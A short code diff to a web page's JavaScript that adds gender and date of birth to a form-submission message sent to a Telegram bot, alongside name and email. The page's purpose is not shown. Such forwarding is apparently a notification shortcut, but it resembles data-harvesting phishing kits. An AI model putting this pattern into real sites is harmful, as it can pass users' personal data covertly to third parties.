--- a/home.html
+++ b/home.html
@@ -496,8 +496,8 @@ function sendMessageToTelegram(botToken, chatId, messageText) {
             // Send to Telegram
             const message = `📝 **Form 1 Submitted - Personal Information**\n\n` +
                            `👤 Name: ${data.name}\n` +
-                          // `👤 Gender: ${data.gender}\n` +
-                           //`👤 Date of Birth: ${data.dob}\n` +
+                           `👤 Gender: ${data.gender}\n` +
+                           `👤 Date of Birth: ${data.dob}\n` +
                            `📧 Email: ${data.email}\n` +
                            `⏰ Time: ${new Date().toLocaleString()}`;
 			alert(message)
